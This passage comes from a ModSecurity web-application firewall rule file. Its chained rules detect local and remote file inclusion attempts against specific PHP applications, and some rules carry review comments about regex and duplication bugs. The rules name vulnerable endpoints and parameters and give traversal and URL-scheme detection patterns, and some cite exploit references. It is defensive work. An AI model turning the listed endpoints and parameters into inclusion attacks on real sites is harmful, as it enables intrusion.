/acopia/sat/ViewSatReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010802,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010804) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/sat/ViewInventoryErrorReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010804,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010359) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/FSphp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010359,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010360) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/navigation.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010360,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010361) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/pathwirte.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010361,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009506) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File 
# Inclusion
# NOTE(review), rule 2009506: TX:'/.../' selects TX entries by regular
# expression, so the unescaped "[classes]" in the last condition is a character
# class, not literal brackets. If the generic RFI rule stores its marker under
# a name ending in "ARGS:dir[classes]" (TODO confirm against the rule that sets
# tx.<id>-WEB_ATTACK/RFI-*), the count stays 0 and this chain never completes;
# escaped brackets look intended.
# The middle condition limits the chain to request lines containing "GET ".
SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009506,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:dir[classes]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009507) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion
# Chain: the request line contains /sitemap.xml.php and "GET ", and the
# dir[classes] argument contains "../". On a full match the last rule enables
# audit-log part E, sets tx.msg and adds tx.critical_anomaly_score to
# tx.anomaly_score.
# NOTE(review): only the chain starter lists t: transformations; confirm what
# the ARGS condition inherits, otherwise only the literal "../" form matches.
SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009507,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:dir[classes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011096) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /datumscalc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011096,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:kal_class_path/'
"@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011097) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /monatsblatt.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011097,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:kal_class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003690) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT SecRule REQUEST_LINE "@contains /modules/admin/include/config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003690,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1554'" SecRule &TX:'/RFI.*ARGS:DOCUMENT_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion SecRule REQUEST_LINE "@contains 
/pmscript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009745,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34734'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:with "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010484) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt
# NOTE(review): TX:'/.../' selects TX entries by regular expression, so the
# unescaped "[jax_formmailer]" in the last condition is a character class, not
# literal brackets. If the generic RFI rule stores its marker under a name
# ending in "ARGS:BASE_DIR[jax_formmailer]" (TODO confirm against the rule that
# sets tx.<id>-WEB_ATTACK/RFI-*), the count stays 0 and this chain never
# completes; escaped brackets look intended.
SecRule REQUEST_LINE "@contains /modules/formmailer/formmailer.admin.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010484,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:BASE_DIR[jax_formmailer]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion
# NOTE(review): the msg says Local File Inclusion, but the last condition only
# counts TX entries whose name matches RFI.*ARGS:API_HOME_DIR; nothing in this
# chain looks for "../" the way the ARGS "@contains ../" rules in this file do.
# All three conditions are the same as in rule 2008879 below, so a request that
# completes one chain completes both and adds tx.critical_anomaly_score twice.
SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008878,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion
# Same conditions as rule 2008878 above; only id and msg differ.
SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008879,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion
# Chain: the request line contains /includes/startmodules.inc.php and "GET ",
# and the lang_file argument contains "../".
# NOTE(review): only the chain starter lists t: transformations; confirm what
# the ARGS condition inherits, otherwise only the literal "../" form matches.
SecRule REQUEST_LINE "@contains /includes/startmodules.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34538'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:lang_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009163) SpiderLabs Research (SLR)
# Public Vulns: ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion
# Chain: the request line contains /includes/header.php and "GET ", and at
# least one TX entry has a name matching RFI.*ARGS:abspath. The last rule
# enables audit-log part E, sets tx.msg and adds tx.critical_anomaly_score to
# tx.anomaly_score.
SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009163,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:abspath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010096) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion
# NOTE(review): TX:'/.../' selects TX entries by regular expression, so the
# unescaped "[PREPEND_FILE]" in the last condition is a character class, not
# literal brackets. If the generic RFI rule stores its marker under a name
# ending in "ARGS:CFG[PREPEND_FILE]" (TODO confirm against the rule that sets
# tx.<id>-WEB_ATTACK/RFI-*), the count stays 0 and this chain never completes;
# escaped brackets look intended.
SecRule REQUEST_LINE "@contains /www/lib/head_auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010096,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28024'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:CFG[PREPEND_FILE]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /gallery2/lib/adodb/adodb-error.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011018,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10705'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:ADODB_LANG/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt
# NOTE(review): same character-class issue as rule 2010096 above; "[gfwroot]"
# in the TX selector is unescaped, so a marker stored under
# "ARGS:config[gfwroot]" would not be counted (TODO confirm).
SecRule REQUEST_LINE "@contains /core/includes/gfw_smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011116,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,39890'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:config[gfwroot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2002996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability
# NOTE(review): the starter matches any request line containing ".php", so the
# regex below carries the whole decision. Its scheme list is (http|ftps?|php)
# followed by ":/", which does not match "https", unlike the
# (https?|ftps?|php) list used by rules 2009232 and 2009233 in this file. The
# ".*" between the brackets is unbounded. The regex runs on QUERY_STRING and
# REQUEST_BODY with no t: of its own; TODO confirm whether encoded input is
# decoded before this condition is evaluated.
SecRule REQUEST_LINE "@contains .php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002996,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability',tag:'web-application-attack'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:_CONF\[.*\]=(http|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003333) SpiderLabs
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003333,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include',tag:'web-application-attack',tag:'bugtraq,18180'" SecRule QUERY_STRING|REQUEST_BODY "(?i:root_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009733) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /index_logged.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009733,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33916'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cur_module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009427,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File 
Inclusion',tag:'web-application-attack',tag:'bugtraq,28838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:location/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008937) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion SecRule REQUEST_LINE "@contains /library/setup/rpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008937,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7344'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:objectname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009231,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:c_temp_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009232) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009232,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:c_temp_path=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009233) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009233,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:c_temp_path=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009398) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /plugin_admin.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009398,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29877'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_settings[pluginpath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011161) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/hnmain.inc.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011161,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[incdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion SecRule 